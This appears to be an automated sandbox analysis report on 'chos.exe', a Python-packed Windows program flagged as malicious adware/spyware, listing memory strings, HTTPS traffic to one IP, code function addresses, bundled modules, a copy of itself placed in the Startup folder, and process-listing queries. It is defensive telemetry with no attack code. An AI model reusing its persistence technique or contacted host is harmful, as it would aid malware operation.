Source: chos.exe, 00000011.00000003.1706710429.00000211B8253000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.rQ
Source: chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: chos.exe, 00000011.00000003.1703493750.00000211B822E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
Source: chos.exe, 00000002.00000003.1477854412.00000159557BC000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1478209771.00000159558E3000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1699028639.00000211B7FFE000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1694956038.00000211B8083000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1695029112.00000211B80C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: chos.exe, 0000000A.00000003.1654672093.00000243B8843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/
Source: chos.exe, 00000000.00000003.1440271500.0000018B76870000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1654672093.00000243B8843000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1654867803.00000243B8851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: chos.exe, 00000011.00000003.1699028639.00000211B7FFE000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1694956038.00000211B8083000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1706710429.00000211B81E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.8:49760 version: TLS 1.2

Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DD1000	0_2_00007FF666DD1000
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DD8BD0	0_2_00007FF666DD8BD0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF5C70	0_2_00007FF666DF5C70
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF69D4	0_2_00007FF666DF69D4
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF0938	0_2_00007FF666DF0938
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE8804	0_2_00007FF666DE8804
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE1FD0	0_2_00007FF666DE1FD0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF9798	0_2_00007FF666DF9798
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE17B0	0_2_00007FF666DE17B0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DEDF60	0_2_00007FF666DEDF60
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF411C	0_2_00007FF666DF411C
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF18E4	0_2_00007FF666DF18E4
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DD9870	0_2_00007FF666DD9870
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE3610	0_2_00007FF666DE3610
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DEE5E0	0_2_00007FF666DEE5E0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE1DC4	0_2_00007FF666DE1DC4
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE5DA0	0_2_00007FF666DE5DA0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE9F10	0_2_00007FF666DE9F10
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF5EEC	0_2_00007FF666DF5EEC
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE1BC0	0_2_00007FF666DE1BC0
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DDA34B	0_2_00007FF666DDA34B
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DDAD1D	0_2_00007FF666DDAD1D
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DDA4E4	0_2_00007FF666DDA4E4
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF3C80	0_2_00007FF666DF3C80
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE2C80	0_2_00007FF666DE2C80
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF0938	0_2_00007FF666DF0938
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DF6488	0_2_00007FF666DF6488
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE3A14	0_2_00007FF666DE3A14
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE21D4	0_2_00007FF666DE21D4
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE19B4	0_2_00007FF666DE19B4
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DE8154	0_2_00007FF666DE8154
Source: C:\Users\user\Desktop\chos.exe	Code function: 0_2_00007FF666DEDACC	0_2_00007FF666DEDACC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD731000	10_2_00007FF7FD731000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7569D4	10_2_00007FF7FD7569D4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD750938	10_2_00007FF7FD750938
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD755C70	10_2_00007FF7FD755C70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD738BD0	10_2_00007FF7FD738BD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD755EEC	10_2_00007FF7FD755EEC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD749F10	10_2_00007FF7FD749F10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD745DA0	10_2_00007FF7FD745DA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD741DC4	10_2_00007FF7FD741DC4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD74E5E0	10_2_00007FF7FD74E5E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD743610	10_2_00007FF7FD743610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD73AD1D	10_2_00007FF7FD73AD1D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7518E4	10_2_00007FF7FD7518E4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD739870	10_2_00007FF7FD739870
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD759798	10_2_00007FF7FD759798
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7417B0	10_2_00007FF7FD7417B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD741FD0	10_2_00007FF7FD741FD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD748804	10_2_00007FF7FD748804
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD74DF60	10_2_00007FF7FD74DF60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD74DACC	10_2_00007FF7FD74DACC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7419B4	10_2_00007FF7FD7419B4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD7421D4	10_2_00007FF7FD7421D4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD743A14	10_2_00007FF7FD743A14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD75411C	10_2_00007FF7FD75411C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD748154	10_2_00007FF7FD748154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD73A4E4	10_2_00007FF7FD73A4E4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD742C80	10_2_00007FF7FD742C80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD753C80	10_2_00007FF7FD753C80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD756488	10_2_00007FF7FD756488
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD750938	10_2_00007FF7FD750938
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD741BC0	10_2_00007FF7FD741BC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: 10_2_00007FF7FD73A34B	10_2_00007FF7FD73A34B

Source: C:\Users\user\Desktop\chos.exe	Code function: String function: 00007FF666DD2710 appears 52 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe	Code function: String function: 00007FF7FD732710 appears 52 times

Source: _overlapped.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.10.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: python3.dll.10.dr	Static PE information: No import functions for PE file found
Source: python3.dll.0.dr	Static PE information: No import functions for PE file found

Source: chos.exe, 00000000.00000003.1427464931.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1428168179.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1427147151.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_asyncio.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1427291874.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1428399209.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1428077354.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1428547743.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1426590138.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs chos.exe
Source: chos.exe, 00000000.00000003.1428914450.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_uuid.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1428724868.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1429055969.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_wmi.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1427624541.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1426840290.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs chos.exe
Source: chos.exe, 00000000.00000003.1426422530.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs chos.exe
Source: chos.exe, 00000000.00000003.1428323610.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1641621400.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_asyncio.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1642801872.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1645041537.00000243B8843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1643035111.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1643743903.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1641456665.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs chos.exe
Source: chos.exe, 0000000A.00000003.1643387769.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1641792858.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1642207235.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1642444057.00000243B8843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1641261727.00000243B8843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs chos.exe
Source: chos.exe, 0000000A.00000003.1642629176.00000243B8849000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1643122607.00000243B8843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs chos.exe
Source: chos.exe, 0000000A.00000003.1643416094.00000243B8843000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs chos.exe

Source: classification engine

Classification label: mal80.adwa.spyw.winEXE@77/198@5/6

Source: C:\Users\user\Desktop\chos.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03

Source: C:\Users\user\Desktop\chos.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI74682

Jump to behavior

Source: chos.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

